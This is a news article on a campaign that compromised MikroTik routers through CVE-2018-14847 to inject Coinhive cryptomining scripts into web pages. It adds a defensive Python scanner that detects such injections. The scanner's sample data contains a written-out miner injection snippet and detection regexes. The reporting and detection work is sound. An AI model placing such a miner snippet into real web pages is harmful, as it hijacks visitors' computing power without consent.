A massive cryptojacking campaign that relies on compromised MikroTik routers serves users with pages injected with the Coinhive mining script.
It seems that the attacker initially focused mainly on compromising devices located in Brazil, but devices in other geo-locations are now being affected as well, making it likely that the attack will spread across the world.
By following the digital breadcrumbs posted online by affected users and other researchers, Kenin mapped the campaign by “following” the Coinhive site-key the attacker is using.
He also pinpointed how the devices are getting compromised: the attacker is exploiting an old vulnerability (CVE-2018-14847) affecting MikroTik routers, which the manufacturer patched in April 2018.
“To MikroTik’s credit, they patched the vulnerability within a day of its discovery, but unfortunately there are hundreds of thousands of unpatched (and thus vulnerable) devices still out there, and tens of thousands of them are in Brazil alone,” Trustwave researcher Simon Kenin noted. The exploit allows the attacker to get unauthenticated remote admin access to any vulnerable MikroTik router.
The attacker used that access to first inject the Coinhive script into every web page that a user visited, and then only into custom error pages, to make the attack less “loud” and less likely to be spotted.
“So if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine Coinhive for the attacker,” Kenin explained.
The attacker also made sure to add a persistence mechanism, scheduled tasks for updating if needed (e.g. in case Coinhive blocked the attacker’s current site-key and it has to be replaced with another), an alternative way to send commands to all compromised devices, and a backdoor.
Kenin also discovered that users who visit websites hosted behind the infected routers are served pages injected with the mining script as well.
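The injection footprint described above (a script tag loading the Coinhive library plus a constructor call carrying the attacker's site-key, appearing mostly in error responses) is something an operator can check for in traffic passing through a suspect router. The following Python scanner is an added example written for this article; it is not Trustwave's or Kenin's code. It assumes the 2018 Coinhive library URL (coinhive.com/lib/coinhive.min.js) and the CoinHive.Anonymous(...)/CoinHive.User(...) constructor pattern, and the sample responses and site-key are constructed placeholders. Grouping findings by site-key mirrors how Kenin tracked the campaign.

```python
"""Flag captured HTTP responses that carry an injected Coinhive miner.

Added example (not from the original article or from Trustwave): given
responses captured on the client side of a router, report which pages were
tampered with, whether the injection landed on an error page, and which
Coinhive site-key each injection uses, so that findings can be grouped into
campaigns the way the article describes.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed indicators for the 2018 Coinhive browser miner: the hosted library
# URL and the constructor call whose first argument is the site-key.
COINHIVE_LIB_RE = re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I)
SITE_KEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User)\(\s*['\"]([A-Za-z0-9_-]{8,})['\"]", re.I
)


@dataclass
class Finding:
    url: str                 # page whose response was tampered with
    status: int              # HTTP status of that response
    site_key: Optional[str]  # attacker's Coinhive site-key, if visible
    error_page: bool         # True when injected into a 4xx/5xx response


def scan_response(url: str, status: int, body: str) -> Optional[Finding]:
    """Return a Finding if the body loads or starts a Coinhive miner, else None."""
    lib_hit = COINHIVE_LIB_RE.search(body)
    key_hit = SITE_KEY_RE.search(body)
    if not lib_hit and not key_hit:
        return None
    return Finding(
        url=url,
        status=status,
        site_key=key_hit.group(1) if key_hit else None,
        error_page=status >= 400,
    )


def scan_all(responses: List[Tuple[str, int, str]]) -> List[Finding]:
    """Scan (url, status, body) tuples and keep only the tampered ones."""
    return [f for f in (scan_response(*r) for r in responses) if f is not None]


def group_by_site_key(findings: List[Finding]) -> Dict[str, List[str]]:
    """Map each site-key to the URLs it was seen on; one key usually = one campaign."""
    groups: Dict[str, List[str]] = {}
    for f in findings:
        groups.setdefault(f.site_key or "<no key>", []).append(f.url)
    return groups


# Constructed sample responses (not real captures); the site-key is a placeholder.
INJECTED_SCRIPT = (
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    "<script>var miner = new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY_0000');"
    "miner.start();</script>"
)
SAMPLE_RESPONSES: List[Tuple[str, int, str]] = [
    # Untouched page served through a clean path.
    ("http://example.test/", 200,
     "<html><body><h1>Welcome</h1></body></html>"),
    # Custom error page rewritten by the router (the "quiet" phase).
    ("http://example.test/missing", 404,
     "<html><head><title>404 Not Found</title>" + INJECTED_SCRIPT
     + "</head><body>Not Found</body></html>"),
    # Ordinary page rewritten by the router (the earlier "every page" phase).
    ("http://example.test/index.html", 200,
     "<html><head>" + INJECTED_SCRIPT + "</head><body>Hi</body></html>"),
]


if __name__ == "__main__":
    for finding in scan_all(SAMPLE_RESPONSES):
        kind = "error page" if finding.error_page else "normal page"
        print(f"{finding.url} ({finding.status}, {kind}) key={finding.site_key}")
    print(group_by_site_key(scan_all(SAMPLE_RESPONSES)))
```

Run it against responses captured from a client behind the router (for example, deliberately requesting a non-existent URL on a known-clean site, since the article notes the injection mostly targets error responses); a hit on a page the origin server does not serve with a miner points at tampering in transit rather than at the site itself.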
New campaigns spring up
“The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices,” Kenin noted.
“There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses; each device serves at least tens if not hundreds of users daily. Even if this attack only works on pages that return errors, we’re still talking about potentially millions of daily pages for the attacker. As mentioned, servers that are connected to infected routers would also, in some cases, return an error page with Coinhive to users that are visiting those servers, no matter where on the internet they are visiting from.”
And, to make matters worse, since he published details about the campaign, which is responsible for compromising over 180,000 MikroTik devices, two other campaigns have sprung up, counting 25,000+ and 15,000+ compromised devices respectively.
Three #cryptojacking campaigns targeting MikroTik routers.
Two using Coinhive, one using Crypto-Loot.
209,501 compromised devices.
— Bad Packets Report (@bad_packets) August 2, 2018
The other two campaigns use different Coinhive site-keys, but that doesn’t necessarily mean that the attacker is a different individual or group. It could be that the initial attacker simply switched to other keys after Kenin exposed the initial campaign.
“This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” he concluded.